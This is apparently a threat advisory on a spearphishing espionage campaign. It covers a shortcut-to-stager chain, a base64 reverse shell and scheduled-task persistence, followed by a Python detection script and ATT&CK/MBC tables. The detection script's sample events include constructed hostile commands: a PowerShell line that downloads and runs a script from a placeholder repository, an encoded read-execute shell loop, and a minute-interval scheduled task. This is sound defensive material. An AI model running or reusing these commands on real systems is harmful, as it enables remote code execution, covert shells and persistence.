EXECUTIVE SUMMARY:
This advisory describes a targeted espionage campaign that begins with carefully themed compressed attachments delivered to selected recipients. The archive contains a shortcut that, when opened, triggers the system scripting interpreter to retrieve and execute a small, staged script hosted on an externally accessible code repository. That staged script carries an encoded payload which decodes to a compact reverse shell implemented as a script; the reverse shell establishes an outbound session that reads operator-supplied text commands, executes them locally, and returns results to the remote controller. Operators also use small native binaries behaving as loaders or implants to spawn interpreter processes and forward input/output streams to a remote controller. A lightweight tunneling component is used in some waves to forward traffic and increase operator flexibility. The primary affected systems are user workstations running a common desktop operating system and standard scripting/command interpreters. The business impact is intelligence loss and sustained unauthorized access: diplomatic communications, transport and communications project details, and resource-sector planning documents are at risk of exposure.
The technical chain is compact and modular: a compressed archive delivers a shortcut that abuses native shortcut handling to invoke the system interpreter and download a staged script from a publicly available repository. The staged script decodes a base64-encoded blob that implements a small persistent read–execute loop: it reads textual commands, evaluates them via the local interpreter, converts results to strings, and sends output back to the operator. In parallel, native loader binaries are used to invoke the same scripted stager via a process-creation API, supporting both embedded blobs and staged downloads; this loader→stager→implant pattern recurs across observed waves. Native implants compiled in a systems language act as TCP/TLS reverse shells: they accept control arguments, connect to a control endpoint, create child processes via standard process APIs, and forward I/O streams; some variants perform simple XOR decoding of embedded strings and use named pipes for local I/O. Operators also leverage an open-source tunneling tool to proxy or forward operator traffic. In at least one wave, a helper script pair writes files to a user temporary folder and creates a scheduled job that runs frequently and immediately on creation, achieving lightweight persistence.
Observed activity represents a focused intelligence-collection operation that combines straightforward social engineering with modular, low-footprint tooling to obtain and maintain interactive access. The adversary consistently reuses a small set of reliable components (shortcut-triggered staged scripts, encoded script blobs, modular loaders, and compact native reverse shells), producing a recognizable operational pattern across different target themes. Hosting staged scripts on public code repositories and relying on an open-source tunneling utility reduces infrastructure cost, but it also leaves discoverable pivot points: the repository URL embedded in the shortcut's target or arguments, and the staged artefacts themselves. Technically, the campaign prioritizes stable command-and-control and operator flexibility over elaborate obfuscation or deep persistence; where persistence is used it is implemented with frequently scheduled jobs and lightweight helper scripts rather than invasive system changes. Strategically, the activity aligns with espionage objectives: selective targeting of diplomatic and infrastructure-related organizations, emphasis on information collection, and quickly deployable toolchains.
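The chain above (shortcut-spawned interpreter fetching a stager from a public repository, a base64 blob that decodes to a read-evaluate-write loop, and a helper that registers a minute-interval scheduled task from a temp folder) maps directly onto process-creation telemetry. The following Python sketch is an added example written for this advisory; it is not code from the campaign's tooling or from the original report. The event schema (image, parent_image, command_line) is an assumed Sysmon-like shape, and every sample event, URL and encoded payload in it is constructed for illustration.

```python
# Added detection sketch for the shortcut -> stager -> encoded-blob -> scheduled-job chain.
# Event records and the base64 payload are CONSTRUCTED; field names are an assumed,
# Sysmon-like schema, not a vendor format.
import base64
import re
from dataclasses import dataclass
from typing import Optional

# Interpreters the chain abuses; explorer.exe is the parent when a user opens an LNK.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
SHORTCUT_PARENTS = {"explorer.exe"}
DOWNLOAD_CUES = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\birm\b|invoke-restmethod"
    r"|net\.webclient|msxml2\.xmlhttp|bitsadmin|certutil.*-urlcache", re.I)
# Raw-content endpoints of public code hosting used for staged scripts.
PUBLIC_REPO_HOSTS = re.compile(
    r"https?://(raw\.githubusercontent\.com|gist\.githubusercontent\.com|gitlab\.com|bitbucket\.org)/", re.I)
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Read -> evaluate -> stringify -> write back: the loop the summary describes (PS and VBS spellings).
READ_EXEC_LOOP = re.compile(
    r"\biex\b|invoke-expression|\beval\b|\bexecute(?:global)?\b|\.Read(?:Line)?\(|out-string", re.I)
SCHTASKS_INTERVAL = re.compile(r"/sc\s+minute(?:\s+/mo\s+(\d+))?", re.I)
TEMP_PATH = re.compile(r"\\(?:AppData\\Local\\)?Temp\\", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def _looks_like_text(s: str) -> bool:
    return bool(s) and all(c.isprintable() or c in "\r\n\t" for c in s)


def decode_b64_blobs(cmdline: str) -> list[str]:
    """Decode long base64 runs in a command line. UTF-8 is tried first: UTF-8 bytes read as
    UTF-16LE become printable CJK noise, while UTF-16LE bytes read as UTF-8 contain NULs
    and fail the text check, so the order matters for -EncodedCommand payloads."""
    blobs = []
    for m in B64_RUN.finditer(cmdline):
        run = m.group(0)
        try:
            raw = base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
        except ValueError:
            continue
        for enc in ("utf-8", "utf-16-le"):
            try:
                text = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if _looks_like_text(text):
                blobs.append(text)
                break
    return blobs


def analyze_schtasks(cmdline: str) -> Optional[Finding]:
    """Flag creation of a task that fires every few minutes and runs something from a temp folder."""
    if "/create" not in cmdline.lower():
        return None
    m = SCHTASKS_INTERVAL.search(cmdline)
    if not m:
        return None
    every = int(m.group(1) or 1)  # schtasks defaults /mo to 1 for /sc minute
    if every <= 5 and TEMP_PATH.search(cmdline):
        return Finding("frequent_task_temp_payload", f"task runs every {every} min from a temp folder")
    return None


def analyze_process_event(ev: dict) -> list[Finding]:
    image = ev.get("image", "").rsplit("\\", 1)[-1].lower()
    parent = ev.get("parent_image", "").rsplit("\\", 1)[-1].lower()
    cmd = ev.get("command_line", "")
    findings = []
    if image in INTERPRETERS and parent in SHORTCUT_PARENTS and DOWNLOAD_CUES.search(cmd):
        host = PUBLIC_REPO_HOSTS.search(cmd)
        where = f" from {host.group(1)}" if host else ""
        findings.append(Finding("shortcut_stager", f"{image} under {parent} with download cue{where}"))
    for text in decode_b64_blobs(cmd):
        if READ_EXEC_LOOP.search(text):
            findings.append(Finding("encoded_read_exec_loop", text[:80]))
    if image == "schtasks.exe":
        f = analyze_schtasks(cmd)
        if f:
            findings.append(f)
    return findings


def triage(events: list[dict]) -> list[list[str]]:
    """Rule names that fire for each event, in input order."""
    return [[f.rule for f in analyze_process_event(ev)] for ev in events]


# Constructed read-execute loop, encoded the way -EncodedCommand expects (UTF-16LE).
LOOP_SCRIPT = 'while($true){$c=$r.ReadLine();$o=iex $c|Out-String;$w.WriteLine($o)}'
ENCODED_LOOP = base64.b64encode(LOOP_SCRIPT.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [  # constructed, not real telemetry; the repository URL is a placeholder
    {"image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -NoProfile Get-ChildItem"},
    {"image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString("
                     "'https://raw.githubusercontent.com/example/repo/main/stage.txt')\""},
    {"image": PS, "parent_image": PS,
     "command_line": f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED_LOOP}"},
    {"image": r"C:\Windows\System32\schtasks.exe", "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'schtasks.exe /create /sc minute /mo 1 /tn Updater /tr "wscript.exe C:\Users\u\AppData\Local\Temp\helper.vbs" /f'},
    {"image": r"C:\Windows\System32\schtasks.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'schtasks.exe /create /sc daily /tn Backup /tr "C:\Tools\backup.exe"'},
]

if __name__ == "__main__":
    for ev, rules in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(rules or ["-"], ev["command_line"][:70])
```

The three rules deliberately key on relationships the summary calls out rather than on hashes or domains: parent-child pairing (explorer.exe to an interpreter) plus a download cue, the decoded content of a long base64 argument rather than the mere presence of -EncodedCommand, and the combination of a short schtasks interval with a temp-folder payload. Tune the interpreter and host lists to the environment; the base64 decoder is the part most worth reusing, since it is where encoded stagers are cheapest to unmask.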
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Resource Development | T1588.002 | Obtain Capabilities | Tool |
| Resource Development | T1583.001 | Acquire Infrastructure | Domains |
| Resource Development | T1587.001 | Develop Capabilities | Malware |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Execution | T1204.002 | User Execution | Malicious File |
| Execution | T1059.005 | Command and Scripting Interpreter | Visual Basic |
| Persistence | T1053.005 | Scheduled Task/Job | Scheduled Task |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Defense Evasion | T1027.010 | Obfuscated Files or Information | Command Obfuscation |
| Defense Evasion | T1036.005 | Masquerading | Match Legitimate Name or Location |
| Discovery | T1082 | System Information Discovery | - |
| Discovery | T1083 | File and Directory Discovery | - |
| Discovery | T1016 | System Network Configuration Discovery | - |
| Collection | T1005 | Data from Local System | - |
| Collection | T1113 | Screen Capture | - |
| Collection | T1115 | Clipboard Data | - |
| Collection | T1560.001 | Archive Collected Data | Archive via Utility |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Command and Control | T1090.001 | Proxy | Internal Proxy |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | - |
MBC MAPPING:
| Objective | Behavior ID | Behavior |
|---|---|---|
| Initial Access | E1204 | User Execution |
| Execution | E1059 | Command and Scripting Interpreter |
| Persistence | F0012 | Registry Run Keys |
| Persistence | F0013 | Scheduled Tasks |
| Defense Evasion | E1027 | Obfuscated Files/Information |
| Defense Evasion | B0003 | Dynamic Analysis Evasion |
| Defense Evasion | F0015 | Hijack Execution Flow |
| Defense Evasion | E1055 | Process Injection |
| Discovery | E1082 | System Information Discovery |
| Discovery | E1083 | File/Directory Discovery |
| Collection | E1113 | Screen Capture |
| Impact | E1510 | Clipboard Modification |
| Command and Control | E1105 | Ingress Tool Transfer |
| Command and Control | B0031 | Domain Name Generation |
| Command and Control | C0002 | HTTP Communication |
| Exfiltration | E1020 | Automated Exfiltration |
REFERENCES:
The following reports contain further technical details: